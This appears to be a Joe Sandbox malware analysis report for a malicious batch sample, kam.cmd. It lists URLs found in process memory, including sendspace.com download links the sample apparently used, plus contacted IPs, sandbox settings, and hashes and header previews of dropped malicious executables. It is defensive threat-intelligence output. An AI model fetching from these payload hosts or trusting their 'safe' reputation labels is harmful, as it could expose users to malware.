https://contoso.com/License | powershell.exe, 00000006.00000002.2407208321.0000000006097000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://stackoverflow.com/a/15123777) | jucheck.exe.9.dr | false | Avira URL Cloud: safe | unknown
http://tempuri.org/ | officeappguardwin32.exe.9.dr | false | URL Reputation: safe | unknown
http://www.computerhope.com/forum/index.php?topic=76293.0 | jucheck.exe.9.dr | false | Avira URL Cloud: safe | unknown
https://fs03n4.sendspace.com | powershell.exe, 00000002.00000002.2504527085.000002505A586000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2504527085.0000025058C43000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://tempuri.org/IRoamingSettingsService/WriteSettingsResponse | officeappguardwin32.exe.9.dr | false | Avira URL Cloud: safe | unknown
http://tempuri.org/IRoamingSettingsService/ReadSettings | officeappguardwin32.exe.9.dr | false | Avira URL Cloud: safe | unknown
http://stackoverflow.com/a/1465386/4224163 | jucheck.exe.9.dr | false | Avira URL Cloud: safe | unknown
https://www.sendspace.com/ | wab.exe, 00000009.00000002.2787822130.0000000006958000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.tutorialspoint.com/javascript/array_map.htm | jucheck.exe.9.dr | false | Avira URL Cloud: safe | unknown
https://github.com/pq-crystals/kyber/commit/28413dfbf523fdde181246451c2bd77199c0f7ffDilithium2Dilith | notification_click_helper.exe.9.dr | false | Avira URL Cloud: safe | unknown
http://SoftwareMicrosoft16.0CommonDebugHKEY_LOCAL_MACHINEHKEY_CURRENT_USER | OfficeScrSanBroker.exe.9.dr | false | Avira URL Cloud: safe | unknown
http://tempuri.org/IRoamingSettingsService/GetConfigResponse | officeappguardwin32.exe.9.dr | false | Avira URL Cloud: safe | unknown
http://tempuri.org/IRoamingSettingsService/WriteSettingshttp://tempuri.org/IRoamingSettingsService/R | officeappguardwin32.exe.9.dr | false | Avira URL Cloud: safe | unknown
http://tempuri.org/IRoamingSettingsService/DisableUser | officeappguardwin32.exe.9.dr | false | Avira URL Cloud: safe | unknown
https://contoso.com/ | powershell.exe, 00000006.00000002.2407208321.0000000006097000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://nuget.org/nuget.exe | powershell.exe, 00000002.00000002.2581460938.000002506881F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2407208321.0000000006097000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://aka.ms/pscore6lBjq | powershell.exe, 00000006.00000002.2403153242.0000000005031000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://fs03n4.sendspaX | powershell.exe, 00000002.00000002.2504527085.000002505A586000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000002.00000002.2504527085.00000250587B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2403153242.0000000005031000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://es5.github.io/#x15.4.4.21 | jucheck.exe.9.dr | false | Avira URL Cloud: safe | unknown
http://tempuri.org/IRoamingSettingsService/EnableUserResponse | officeappguardwin32.exe.9.dr | false | Avira URL Cloud: safe | unknown
https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/String/startsWith | jucheck.exe.9.dr | false | URL Reputation: safe | unknown
https://www.sendspace.com/pro/dl/12aciiBl | wab.exe, 00000009.00000002.2787822130.000000000699D000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://tempuri.org/IRoamingSettingsService/WriteSettings | officeappguardwin32.exe.9.dr | false | Avira URL Cloud: safe | unknown
http://nuget.org/NuGet.exe | powershell.exe, 00000002.00000002.2581460938.000002506881F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2407208321.0000000006097000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.sendspace.com/pr | wab.exe, 00000009.00000003.2365648701.00000000069CA000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000006.00000002.2403153242.000000000518C000.00000004.00000800.00020000.00000000.sdmp | true | URL Reputation: malware | unknown
https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Array/filter | jucheck.exe.9.dr | false | Avira URL Cloud: safe | unknown
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000006.00000002.2403153242.000000000518C000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://go.micro | powershell.exe, 00000002.00000002.2504527085.0000025059A59000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/Icon | powershell.exe, 00000006.00000002.2407208321.0000000006097000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://fs13n1.sendspace.com/=6 | wab.exe, 00000009.00000003.2365648701.00000000069E2000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.2372986169.00000000069E2000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://javadl-esd-secure.oracle.com/update/%s/map-m-%s.xmlhttps://javadl-esd-secure.oracle.com/upda | jucheck.exe.9.dr | false | Avira URL Cloud: safe | unknown
https://www.sendspace.com/pro/dl/i41a76P | powershell.exe, 00000002.00000002.2504527085.00000250589DD000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://tempuri.org/IRoamingSettingsService/DisableUserResponse | officeappguardwin32.exe.9.dr | false | Avira URL Cloud: safe | unknown
http://java.sun.comnot | jucheck.exe.9.dr | false | Avira URL Cloud: safe | unknown
http://nsis.sf.net/NSIS_ErrorError | wab.exe, 00000009.00000002.2799289733.0000000022290000.00000004.00000010.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.sendspace.com | powershell.exe, 00000002.00000002.2504527085.000002505A561000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://github.com/Pester/Pester | powershell.exe, 00000006.00000002.2403153242.000000000518C000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://javadl-esd-secure.oracle.com/update/%s/map-%s.xml | jucheck.exe.9.dr | false | Avira URL Cloud: safe | unknown
https://www.sendspace.com | powershell.exe, 00000002.00000002.2504527085.000002505A55C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2504527085.00000250589DD000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://java.sun.com | jucheck.exe.9.dr | false |
                    • URL Reputation: safe
                    unknown
                    https://www.sendspace.com/Jwab.exe, 00000009.00000002.2787822130.0000000006958000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://stackoverflow.com/questions/1026069/capitalize-the-first-letter-of-string-in-javascriptjucheck.exe.9.drfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://javadl-esd-secure.oracle.com/update/%s/map-m-%s.xmljucheck.exe.9.drfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Array/Reducejucheck.exe.9.drfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://schemas.datacontract.org/2004/07/Microsoft.Office.Web.Roaming.SoapObjectsItemsSortKeyArrayOfRofficeappguardwin32.exe.9.drfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://fs03n4.sendspace.compowershell.exe, 00000002.00000002.2504527085.000002505A59A000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://tempuri.org/IRoamingSettingsService/GetConfigofficeappguardwin32.exe.9.drfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/String/Trimjucheck.exe.9.drfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://stackoverflow.com/questions/1068834/object-comparison-in-javascriptjucheck.exe.9.drfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://tempuri.org/IRoamingSettingsService/ReadSettingsResponseofficeappguardwin32.exe.9.drfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://schemas.datacontract.org/2004/07/Microsoft.Office.Web.Roaming.SoapObjectsofficeappguardwin32.exe.9.drfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://aka.ms/pscore68powershell.exe, 00000002.00000002.2504527085.00000250587B1000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Array/indexOfjucheck.exe.9.drfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://tempuri.org/IRoamingSettingsService/EnableUserofficeappguardwin32.exe.9.drfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://fs13n1.sendspace.com/wab.exe, 00000009.00000003.2365648701.00000000069E2000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.2372986169.00000000069E2000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000002.2787822130.00000000069E2000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://github.com/pq-crystals/kyber/commit/28413dfbf523fdde181246451c2bd77199c0f7ffnotification_click_helper.exe.9.drfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://fs13n1.sendspace.com/Z6:wab.exe, 00000009.00000003.2372986169.00000000069E2000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
IP              Domain                  Country         ASN     ASN Name            Malicious
69.31.136.17    fs03n4.sendspace.com    United States   3257    GTT-BACKBONEGTTDE   false
104.21.28.80    www.sendspace.com       United States   13335   CLOUDFLARENETUS     false
69.31.136.57    fs13n1.sendspace.com    United States   3257    GTT-BACKBONEGTTDE   false
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1446714
Start date and time: 2024-05-23 20:11:53 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 8m 24s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 12
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: kam.cmd
Detection: MAL
Classification: mal100.spre.troj.evad.winCMD@14/164@3/3
EGA Information: Failed
HCA Information:
• Successful, ratio: 77%
• Number of executed functions: 49
• Number of non-executed functions: 23
Cookbook Comments:
• Found application associated with file extension: .cmd
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target powershell.exe, PID 1716 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 5572 because it is empty
• HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• Not all processes were analyzed; the report is missing behavior information.
• Report size exceeded maximum capacity and may be missing behavior information.
• Report size getting too big, too many NtOpenFile calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryAttributesFile calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• VT rate limit hit for: kam.cmd
Time       Type              Description
14:12:39   API Interceptor   452x Sleep call for process: powershell.exe modified
Process: C:\Program Files (x86)\Windows Mail\wab.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 275560
Entropy (8bit): 6.100887295483481
Encrypted: false
SSDEEP: 3072:/rkkP5KVkD8QC2mCBFv9m7usyT8tKQ9clyPqlO91/iDVSsWUG0bCP0BwOvOIXM:/4VQjVsxyItKQNhigibKCM
MD5: AA874F4DC4061965993D91D3B5FC3639
SHA1: 9A35E342D18389963F6F13555913597EB6CBC59C
SHA-256: 07FB7F6D9498BAE332E45617ACEA5CECB4186218AA8F1EB934AB2D48BA8FEB05
SHA-512: FBD1F63321327AB227C25E88F9CD47FF713D452E526A3CAF892A008034EAC5F2A1E95C4B21F54372AC95F679C2C82EA31EC5883B81ABF1190AD949F1B4615961
Malicious: true
Joe Sandbox View:
• Filename: 1716263286d2712d90132eba451811b2abad23213fcee88b437d472a205286a56bdc7957f4476.dat-decoded.exe, Detection: malicious
Reputation: low
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):217704
                                                                              Entropy (8bit):6.356771671512563
                                                                              Encrypted:false
                                                                              SSDEEP:3072:/rk3xFVaK4T6fWSlXe0lJQafeyrR0kr/yh5DEU/Pk13TfwqiTP0McBUNnUxTtd4N:y2K4TSFo5Y683TdiQMcGNUl4N
                                                                              MD5:0576F2AD6C31F9F557B9166A4E5B1CDE
                                                                              SHA1:AA825C3A13A9528B2CE553B3CAB4DA4407CAEDF5
                                                                              SHA-256:6805AA9ADE6C02506EE0E7E4DB52927B8336BC13FA3C10D9B4525B7297A61676
                                                                              SHA-512:D923411444B35DB3FEF062CBE129CC68FFFB4D8391185B94B93988DF76D6013158245164B837B4C86C529E9CF9848827EE7E564A521255D5A99F1B19F156AD4B
                                                                              Malicious:true
                                                                              Joe Sandbox View:
                                                                              • Filename: 1716263286d2712d90132eba451811b2abad23213fcee88b437d472a205286a56bdc7957f4476.dat-decoded.exe, Detection: malicious
                                                                              Reputation:low
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):237160
                                                                              Entropy (8bit):6.19362218837873
                                                                              Encrypted:false
                                                                              SSDEEP:3072:/rkMyRnuBGwl/1Gc9QnvGqyWQ93kr/yh5DEU/P5kP0zU35iuvQBUeGMLu:4l3wdYtcH9b5Y651zU77Ea
                                                                              MD5:6F302C0AA579B094CBE24E5B4DBD6D47
                                                                              SHA1:35C560D585FB0308949C02F8EC53DA22C7FA19AD
                                                                              SHA-256:4EC88EB380899460D7DF0DFC23E52CD4320306AAA2954AB78B1A5EF0CA3BD77C
                                                                              SHA-512:3817838FCEBEEF09CA3001B0B338CFF8BB74C42B73F2618016FC8294249609FA6CD65C955326D641E90F7DB74AEB00F90F6F3267A3071752BD2896A411513940
                                                                              Malicious:true
                                                                              Joe Sandbox View:
                                                                              • Filename: 1716263286d2712d90132eba451811b2abad23213fcee88b437d472a205286a56bdc7957f4476.dat-decoded.exe, Detection: malicious
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):1675872
                                                                              Entropy (8bit):7.428945763224762
                                                                              Encrypted:false
                                                                              SSDEEP:24576:NC51xB6B9YNgqe1xTVIlz7X9zOo4PjnikEpx/nLWvJ+l:yK0eqkSR7Xgo4TiRPnLWvJY
                                                                              MD5:61D6FED123118E8EE0BC42F1C0762E72
                                                                              SHA1:F661A58070F467E80BA7592DDC3BB3ECE235A536
                                                                              SHA-256:2B94D13DCF7D675C9A74E92FAC2B31C4DF2F392ACE777A94C89D431979E52A89
                                                                              SHA-512:2F0AE53557FAA193853E8646663F96A64BD17A078208ADBDD8FC6022002AB7F7D63EDD75FC9D44ADC1D5C744DC38CA16896A7DB381179685F04E6E59089144DB
                                                                              Malicious:true
                                                                              Joe Sandbox View:
                                                                              • Filename: 1716263286d2712d90132eba451811b2abad23213fcee88b437d472a205286a56bdc7957f4476.dat-decoded.exe, Detection: malicious
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):1841760
                                                                              Entropy (8bit):7.32243413749646
                                                                              Encrypted:false
                                                                              SSDEEP:24576:LEeK2NocwiN/jc41p3qp11JsqbhOUe1xTVIlz7X9zOo4PjnikEpx/nLWvJ+i:ZfYP1JsEDkSR7Xgo4TiRPnLWvJD
                                                                              MD5:783C051072E1D238DA994E95DABCBF6E
                                                                              SHA1:1CB52C65962C8DD150B5ED7172631E14824A5102
                                                                              SHA-256:C61EA0A64369DB217167BECC7A4D01AC2C97FA1D8CAD43189DCBEDD7F0142557
                                                                              SHA-512:16ED187A7BB9AEA9278ADB0C43EF4B5A4D58228A4B66441377CFF5EDBAA4A84220AC0E7760DE606DBFA4672E82D99C6242FEC59946B33C1DBD4328DCB573EF5D
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):346624
                                                                              Entropy (8bit):7.791635057531845
                                                                              Encrypted:false
                                                                              SSDEEP:6144:LpXDXz7yIrozs0WuNd3ojusBdgnNW6r4F53ttuGENGFdVCLEYnPO1D7YYoSyZCWz:L9zGImAjJdcH4j3ttzFdVCLNSfHoSWCG
                                                                              MD5:B54F778BABB81D6C30BFA202F89EEE0D
                                                                              SHA1:3D027D339CC635F6BA046CB90B041877CF562162
                                                                              SHA-256:6090BBD5F090319967C17CDC4E2465EB8A680EE84647E863451B9B51453EE8AF
                                                                              SHA-512:0B39C94016120EE7FE21DD9D1DC41AFB61330DAE90362F14F97A716304311EAD9D6BFFC44DD70C8B596802DAE6FF8F94504A3C56C6BE1914C1435CBEBBDA24EE
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):165976
                                                                              Entropy (8bit):5.7704448291370625
                                                                              Encrypted:false
                                                                              SSDEEP:3072:/rk3okvQ4gXIRSG+7IJqC3CJyoDjpBnjkP0XGx2SYg+b/Q+y1s3:pnGZLknnj1X62SYdb4I
                                                                              MD5:6C5024852E53944BC5E619032E91EE75
                                                                              SHA1:F3AF98C27CE37CF0157871DF3C376052F8F9312A
                                                                              SHA-256:13AE96DD7EEA7B543FBF94CF173E0BAFB62C6604816D0C975DF0332E49F84582
                                                                              SHA-512:84D6C4FACB7478128121755E024249599B1B0F71CDF1CD1A11CD6AE53C982367511ADCF8FA97021AEEBF01EFD9FA86051C8CF371D21153087F775069C792187F
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):1113176
                                                                              Entropy (8bit):6.40004020826486
                                                                              Encrypted:false
                                                                              SSDEEP:24576:2TC6Rb6qu1PyC+NRLtpScpzbtT7pyOolKL8Sq/jrc5xaNIBg:2+6AqSPyC+NltpScpzbtvpJoMQSq/jrL
                                                                              MD5:42A434581A9BB44B8530A921550CF17E
                                                                              SHA1:3E0078F0BA260036000968579F58BCCDBCD61769
                                                                              SHA-256:67CEA6E433605652DA3BC35A75C9DE5222DFBEA9F063744037CD79BFF516D84E
                                                                              SHA-512:9E391F0D8B059413373B68BBD5D0D2AD1B6397C238D2D26D32CAC1AA15CCD3202F514330967722F91DA4E7BA550D5892CFF4DA63B1EB6A66A14C9C463F66A1DB
                                                                              Malicious:true
                                                                              Antivirus:
                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):2414080
                                                                              Entropy (8bit):6.710317121419989
                                                                              Encrypted:false
                                                                              SSDEEP:49152:h0GSXoV72tpV9XE8Wwi1aCvYMdRluS/fYw44RxL8:e4OEtwiICvYMpfc
                                                                              MD5:A24DA8C79D1B52417FFE52CC6A36A43A
                                                                              SHA1:141012704D8BE413B7D7BF129B184764B7439179
                                                                              SHA-256:1EB0A26BC91C6AA08A426DDDFF8615E5A0D374E9AC6E89FF0C2EB0C73763A913
                                                                              SHA-512:669911D738DA068785CBE44F2D8FB92AD18F08E7A8418EAF549E93D6DEC816F7242D71E3EA1A5F89FA3685E9415630E38FE4059D6B296148CF340A94AD662EEB
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):113233
                                                                              Entropy (8bit):6.280496469967927
                                                                              Encrypted:false
                                                                              SSDEEP:1536:sEl9bbS3VofCrNGqLtZnMjbPmsAYBdTU9fEAIS2PEtuGCrK:/rkACrNGEtajbefY/TU9fE9PEtuGCrK
                                                                              MD5:72C8B1DC3E7AEAD3B804FB784C9202DF
                                                                              SHA1:5FDA23CBB7C3E82A938CE412C3C1574B1FB6350F
                                                                              SHA-256:2CF1A48566846598E7134EB1F5E402937E1E0F4EDB4B522D2CB44681076882B2
                                                                              SHA-512:DD5E57335DEA15FDC81198636D7ACFF27B49A8D0C50BBC8B26E3106A149D9889E1DDABB277CFA8279204B82155111DDE933E64203C5715D290017F9BBD169914
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):409608
                                                                              Entropy (8bit):6.339039046737096
                                                                              Encrypted:false
                                                                              SSDEEP:6144:UvqF1Ged2RYbguEuFuTkdj+zRGa7JkjrXyPyMMWvpBVOaqahUqjAGT:xbgvuFuQdj+zRTJkX8yMhB3jhBAi
                                                                              MD5:8D0A97059A190F777B425ECF1E8E9442
                                                                              SHA1:C450D9422A0DB8C39A274C1F3EBB2255A4D40E03
                                                                              SHA-256:029089E37E60DA6EE61E08C9C92E0FC48DE78D3FF53A566A71FB9795359E0196
                                                                              SHA-512:609093002FB13CD8776BAC599EC0E3D999F4BB71DC3128834A3E5A7642E85BF0B694A834E898B6A0614F4B0E2F3A7A87D99030DB7677DBC55F140079CB304C19
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):214512
                                                                              Entropy (8bit):6.242999725098675
                                                                              Encrypted:false
                                                                              SSDEEP:3072:/rkfGnUI/9FXK4+PoSZSb5qURwubvvnzdl1CkTlxAenDl3SoxceC76JNKjzDI5:KGUcsvZZvUmubv7hTHA8l3yROJyDI5
                                                                              MD5:D90DDA30DA5ED08959042648374D9153
                                                                              SHA1:37FD707B384D7684584D6D6B45FC75EDA02FFFBF
                                                                              SHA-256:F01F16359CC5BEAAC9A59BDAAA78BBB172F5B852875FDCC7CDB90C10F6AC22AF
                                                                              SHA-512:C27C0493D611882BE6FA63C3A3AD1B0FBDA7F2D4FDCDB0DCAB363DA3FEA78AA1814DAF31A86EF3064B39B20F0E41E87A851E506F54D89C47E856923E8788EC5B
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):568400
                                                                              Entropy (8bit):6.589660608389939
                                                                              Encrypted:false
                                                                              SSDEEP:12288:TyvTCXdXikLj2jR7trg6Qi3vYsKTU00vq:TyyLj8trn3wsq0vq
                                                                              MD5:267DDE27EAF6950E8CA2FAB44777A6A1
                                                                              SHA1:940CD4BFA9B26FD75B23799055124DBE7AEC548A
                                                                              SHA-256:7B7F7DF16EC41961DAEC3DCE736D6127F9ABA03779BEC8B65EA24553FD1B52DA
                                                                              SHA-512:1FB1A1CB24D549539F87CDDAEC0F54DF66B7DC3C1C9C0BDAA8DED690AC722F846380D034422110F52F171D5148C78B745D4FC88C6B98A23F3CFE064CE2CDFBD9
                                                                              Malicious:true
